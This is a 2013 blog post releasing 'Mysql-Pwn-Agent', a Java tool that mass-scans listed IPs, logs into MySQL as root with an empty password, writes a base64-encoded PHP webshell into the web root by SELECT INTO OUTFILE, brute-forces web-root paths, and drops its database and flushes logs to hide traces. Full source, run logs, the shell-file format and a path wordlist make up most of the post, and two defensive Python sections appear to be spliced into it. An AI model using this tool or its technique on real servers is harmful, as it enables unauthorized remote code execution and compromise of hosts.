
Saturday, February 9, 2013

Mysql-Pwn-Agent Beta


 

Hello and good morning to all readers. I got up quite early today and in fact I slept very late last night. argh..

But I'm done with Mysql-Pwn-Agent Beta.

Mysql Pwn Agent is an auto-exploit for MySQL plus any Windows HTTP server; I use XAMPP for testing.

Here is my simple PoC (proof of concept):

Paint wtf ;)

[Image: untitled]

 

After some days playing with Java JDBC and XAMPP MySQL and Apache, I finished writing the exploit, thanks to Yeohwa for some hints.

Here are some screenshots.

We need a test server: start XAMPP with the Apache web server and the MySQL database.

 

[Screenshot: xampp]

 

Get the exploit and add some IPs to scan.txt. Add your base64-encoded PHP shell code to shell.txt. Start the exploit. You can use php/reverse/metapreter/ from Metasploit to get a reverse shell, but it sucks with my online check-shell class because the Metasploit PHP reverse shell never stops loading. Better to use any PHP shell or my simple upload script.

 

[Screenshot: input]

The PoC exploit:

 

[Screenshot: exploit]

 

Exploit output when it fails. It creates a random database and table on every attempt. It uses dir.txt to brute-force the Apache htdocs root directory, uploads the shell there, and checks whether the shell is online.

 

#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database rcdmiwb
Creating Table rcdmiwb
rcdmiwb Table created successfully...
rcdmiwb Connecting to database rcdmiwb Again...
Insert Shell Into Table rcdmiwb...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\rcdmiwb.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database bffatwe
Creating Table bffatwe
bffatwe Table created successfully...
bffatwe Connecting to database bffatwe Again...
Insert Shell Into Table bffatwe...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\bffatwe.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################






Exploit output when it WINs.



#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database tdduvjs
Creating Table tdduvjs
tdduvjs Table created successfully...
tdduvjs Connecting to database tdduvjs Again...
Insert Shell Into Table tdduvjs...
Creating outfile to hdd...
Upload /xampp/htdocs/tdduvjs.php Done...
Successfully Exploit Done ...
Connecting to database tdduvjs Again...
Drop Database tdduvjs...
Successfully Dropped tdduvjs Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database memaarx
Creating Table memaarx
memaarx Table created successfully...
memaarx Connecting to database memaarx Again...
Insert Shell Into Table memaarx...
Creating outfile to hdd...
Upload /xampp/htdocs/memaarx.php Done...
Successfully Exploit Done ...
Connecting to database memaarx Again...
Drop Database memaarx...
Successfully Dropped memaarx Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!


Now it finds the document root and we WIN and have your shells ready ;)



Look in results.txt; the saved shells are there.



#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
Shell Date: 09.02.2013 12:15
#######################################################################

#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
Shell Date: 09.02.2013 12:15
#######################################################################
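
The winning run above leaves a recognizable trail in the MySQL general query log: a SELECT ... INTO OUTFILE that writes a .php file, followed by DROP DATABASE and FLUSH LOGS from the same client over fresh connections. The detection routine below is an added example, not part of the original post; the log line shape, the sample lines and the addresses are constructed assumptions.

```python
import re

# Assumed line shape (MySQL general query log): "<time>\t<conn id> <Command>\t<argument>"
LINE = re.compile(r"^\S+\s+(\d+)\s+(Connect|Query)\s*(.*)$")
OUTFILE = re.compile(r"\binto\s+(?:out|dump)file\s+'([^']+)'", re.I)
CLEANUP = re.compile(r"^\s*(drop\s+database|flush\s+logs)\b", re.I)
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")

# Constructed sample: the statement sequence from the post (three connections,
# one client) plus an unrelated CSV export from another client.
SAMPLE_LOG = "\n".join([
    "2013-02-09T12:15:01Z\t   41 Connect\troot@192.0.2.10 on",
    "2013-02-09T12:15:01Z\t   41 Query\tCREATE DATABASE tdduvjs",
    "2013-02-09T12:15:02Z\t   42 Connect\troot@192.0.2.10 on tdduvjs",
    "2013-02-09T12:15:02Z\t   42 Query\tINSERT INTO user_upload VALUES ('<?php /* elided */ ?>')",
    "2013-02-09T12:15:02Z\t   42 Query\tselect * into outfile 'C:/xampp/htdocs/tdduvjs.php'from user_upload",
    "2013-02-09T12:15:03Z\t   43 Connect\troot@192.0.2.10 on tdduvjs",
    "2013-02-09T12:15:03Z\t   43 Query\tDROP DATABASE tdduvjs",
    "2013-02-09T12:15:03Z\t   43 Query\tFLUSH LOGS",
    "2013-02-09T12:20:00Z\t   50 Connect\treport@192.0.2.77 on sales",
    "2013-02-09T12:20:00Z\t   50 Query\tSELECT * INTO OUTFILE '/var/backups/q1.csv' FROM orders",
])


def detect(log_text):
    """Map each client that wrote a script file via INTO OUTFILE to what it did."""
    client_of = {}  # connection id -> "user@host"; the tool reconnects per step
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        conn_id, command, arg = m.groups()
        if command == "Connect":
            client_of[conn_id] = re.split(r"\s+on\b", arg)[0]
            continue
        client = client_of.get(conn_id, "unknown")
        out = OUTFILE.search(arg)
        if out and out.group(1).lower().endswith(SCRIPT_EXT):
            hit = findings.setdefault(client, {"files": [], "cleanup": []})
            hit["files"].append(out.group(1))
        elif client in findings and CLEANUP.match(arg):
            # Later DROP DATABASE / FLUSH LOGS from the same client is the
            # tidy-up step; FLUSH LOGS reopens log files, it does not erase them.
            verb = CLEANUP.match(arg).group(1)
            findings[client]["cleanup"].append(" ".join(verb.upper().split()))
    return findings


if __name__ == "__main__":
    for client, hit in detect(SAMPLE_LOG).items():
        print(client, hit["files"], hit["cleanup"])
```

Correlating by client rather than by connection id matters here because main.java opens a new connection for the create, write and drop steps.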


The result with the base64-encoded upload script:



[Screenshot: uploadscript]



YeahhhHhhh, we got an upload script to upload your shell. Nothing new … ;)



Have pfun



main.java



package sploit;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.sql.Connection;
import java.sql.Date;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.sql.Statement;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.GregorianCalendar;
import java.util.Random;
import java.util.Scanner;

import sploit.checkshell;

public class main {
// JDBC driver name and database URL
static String output = null;
static String outputshell = null;

// Database credentials
static final String USER = "root";
static final String PASS = "";

/**
* @param args
* @throws IOException
*/



public static void main(String[] args) throws IOException {
System.out.println(" Mysql-Pwn-Agent-Exploit Beta 1 ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");

System.out.print("Press 2x Enter to fire ...");
Scanner sc = new Scanner(System.in);
while(!sc.nextLine().equals(""));
sc.nextLine();
sc.close();

// Open the file that is the first
// command line parameter
FileInputStream dirstream10 = new FileInputStream("shell.txt");
// Get the object of DataInputStream
DataInputStream dir0 = new DataInputStream(dirstream10);
BufferedReader b10 = new BufferedReader(new InputStreamReader(dir0));
String strLine10;
//Read File Line By Line

//Read File Line By Line
while ((strLine10 = b10.readLine()) != null) {
// Print the content on the console
String shell = strLine10;
//System.out.println (shell);

try{
// Open the file that is the first
// command line parameter
FileInputStream dirstream1 = new FileInputStream("dir.txt");
// Get the object of DataInputStream
DataInputStream dir = new DataInputStream(dirstream1);
BufferedReader b1 = new BufferedReader(new InputStreamReader(dir));
String strLine1;
//Read File Line By Line

//Read File Line By Line
while ((strLine1 = b1.readLine()) != null) {
// Print the content on the console
String dirbrute = strLine1;
//System.out.println (strLine1);


// Open the file that is the first
// command line parameter
FileInputStream fstream = new FileInputStream("scan.txt");
// Get the object of DataInputStream
DataInputStream in = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String strLine;


while ((strLine = br.readLine()) != null) {
// Print the content on the console
//System.out.println (strLine);

//Main Connect to db
Connection conn = null;
Statement stmt = null;
try{
//STEP 1: Init Random
Random ran = new Random();
int top = 6;
char data = ' ';
String dat = "";

for (int i=0; i<=top; i++) {
data = (char)(ran.nextInt(25)+97);
dat = data + dat;
}

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");
final String DB_URL = "jdbc:mysql://"+strLine+"/";
final String DB_URL3 = "jdbc:mysql://"+strLine+"/"+dat+"";
final String DB_URL2 = "jdbc:mysql://"+strLine+"/"+dat+"";


//STEP 3: Open a connection
System.out.println("#######################################################################");
System.out.println("###########################by cr4shyyy#################################");
System.out.println("#######################################################################");
System.out.println("Connecting to database..."+strLine);

conn = DriverManager.getConnection(DB_URL, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Creating database "+dat);
stmt = conn.createStatement();
String sql = "CREATE DATABASE "+dat;
stmt.executeUpdate(sql);
//System.out.println("Done...");

System.out.println("Creating Table "+dat);
String sql2 = "CREATE TABLE `"+dat+"`.`user_upload` (`track2` VARCHAR( 55060 ) NOT NULL) ENGINE = MYISAM ;";
stmt.executeUpdate(sql2);
//System.out.println("Done...");
System.out.println(dat+" Table created successfully...");

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");

//STEP 3: Open a connection
System.out.println(dat+" Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL2, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Insert Shell Into Table "+dat+"...");
stmt = conn.createStatement();
String sql0 = "INSERT INTO user_upload " + "VALUES ('<?php sleep(10);" +shell+ "" + " ?>')";
stmt.executeUpdate(sql0);
//System.out.println("Done...");



System.out.println("Creating outfile to hdd...");
String sql4 = "select * into outfile 'C:"+""+dirbrute+""+dat.toString() +".php'" + "from user_upload";

stmt.executeQuery(sql4);

System.out.println("Upload "+strLine1+""+ dat +".php Done...");
System.out.println("Successfully Exploit Done ...");


//STEP 3: Open a connection
System.out.println("Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL3, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Drop Database "+dat+"...");
stmt = conn.createStatement();
String sql01 = "DROP DATABASE "+dat;
stmt.executeUpdate(sql01);
//System.out.println("Done...");
System.out.println("Successfully Dropped "+dat+" Table ...");

System.out.println("Flush logs ...");
stmt = conn.createStatement();
String sql1 = "FLUSH LOGS";
stmt.executeUpdate(sql1);
//System.out.println("Done...");
System.out.println("Successfully FLUSH Logs Done ...");
System.out.println("#######################################################################");
System.out.println("#######################################################################");
if ((checkshell.exists("http://"+strLine+"/"+""+dat+".php")) == true) {
System.out.println("By Security-is-just-an-illusion.blogspot.de");
System.out.println("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
//System.out.println(checkshell.exists("http://"+strLine+"/"+""+dat+".php"));
FileWriter writer;
File file;
file = new File("results.txt");
writer = new FileWriter(file ,true);
writer.write(System.getProperty("line.separator"));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.write(System.getProperty("line.separator"));
writer.write("By http://Security-is-just-an-illusion.blogspot.de");
writer.write(System.getProperty("line.separator"));
writer.write("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
writer.write(System.getProperty("line.separator"));
GregorianCalendar now=new GregorianCalendar();
DateFormat df=DateFormat.getDateInstance(DateFormat.MEDIUM);
writer.write("Shell Date: "+df.format(now.getTime())+" ");
//System.out.println("Shell Date: "+df.format(now.getTime())+" ");
df=DateFormat.getTimeInstance(DateFormat.SHORT);
//System.out.println(df.format(now.getTime()));
writer.write(df.format(now.getTime()));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.flush();
writer.close();
}

else{
System.out.println("Shell_Exploit-Negativ.");
}

System.out.println("#######################################################################");
System.out.println("#######################################################################");

}catch(SQLException se){
//Handle errors for JDBC
System.err.println("SQLState: " +
((SQLException)se).getSQLState());
System.err.println("Error Code: " +
((SQLException)se).getErrorCode());
System.err.println("Message: " + se.getMessage());
}catch(Exception e){
//Handle errors for Class.forName
e.printStackTrace();
}finally{
//finally block used to close resources
try{
if(stmt!=null)
stmt.close();
}catch(SQLException se2){
}// nothing we can do
try{
if(conn!=null)
conn.close();
}catch(SQLException se){
System.out.println("SQL Fehler "+se.getMessage());
}//end finally try
}//end try
System.out.println("Goodbye by http://security-is-just-an-illusion.blogspot.de!");
//END

}
}
//Close the input stream
dir.close();
}catch (Exception e){//Catch exception if any
System.err.println("Error: " + e.getMessage());
}
}
}

private static boolean blub(String string) {
// TODO Auto-generated method stub
return false;
}
}
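
main.java only succeeds when mysqld accepts TCP logins from other hosts and INTO OUTFILE is allowed to write under the web root. The audit below is an added example, not code from the original post; it checks a my.ini for those two settings, and the sample fragments, the web_roots default and the function name are assumptions.

```python
import configparser

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed option-file fragments; paths and values are illustrative.
WEAK_INI = '[mysqld]\nport = 3306\ndatadir = "C:/xampp/mysql/data"\n'
HARDENED_INI = ('[mysqld]\nport = 3306\nbind-address = 127.0.0.1\n'
                'secure_file_priv = "C:/mysql-exports"\n')


def audit_mysqld(ini_text, web_roots=("c:/xampp/htdocs",)):
    """Return findings for the [mysqld] settings the technique depends on."""
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, delimiters=("=",))
    cp.read_string(ini_text)
    opts = {}
    if cp.has_section("mysqld"):
        for key, value in cp.items("mysqld"):
            # Option files treat '-' and '_' in option names as equivalent.
            opts[key.replace("-", "_")] = (value or "").strip().strip("\"'")
    findings = []
    if "skip_networking" not in opts and opts.get("bind_address", "*") not in LOOPBACK:
        findings.append("network: mysqld listens for TCP clients beyond loopback")
    export_dir = opts.get("secure_file_priv")
    if export_dir is None:
        findings.append("file: secure_file_priv not pinned; confirm the effective "
                        "value with SHOW VARIABLES LIKE 'secure_file_priv'")
    elif export_dir == "":
        findings.append("file: secure_file_priv is empty, INTO OUTFILE may write anywhere")
    elif export_dir.upper() != "NULL":
        # A permitted export directory must not sit inside (or contain) a web root.
        norm = export_dir.replace("\\", "/").lower().rstrip("/")
        if any(norm == r or norm.startswith(r + "/") or r.startswith(norm + "/")
               for r in web_roots):
            findings.append("file: secure_file_priv overlaps a web root")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_mysqld(text))
```

The root account with an empty password that the tool logs in with lives in the mysql.user table, not in my.ini, so it needs a separate check.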


Checkshell.java






package sploit;
import java.net.*;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
try {
HttpURLConnection.setFollowRedirects(false);
// note : you may also need
// HttpURLConnection.setInstanceFollowRedirects(false)
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setRequestMethod("HEAD");
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
e.printStackTrace();
return false;
}
}
}



shell.txt




eval(base64_decode("[base64 payload omitted]"));



dir.txt



/htdocs/
/phpmyadmin/
/phpMyAdmin/
/PMA/
/pma/
/admin/
/dbadmin/
/mysql/
/myadmin/
/phpmyadmin2/
/phpMyAdmin2/
/phpMyAdmin-2/
/php-my-admin/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
/mysqladmin/
/mysql-admin/
/xampp/htdocs/
/APMServ5.2.6/www/htdocs/
/www/htdocs/




Use it for personal use or study purposes.
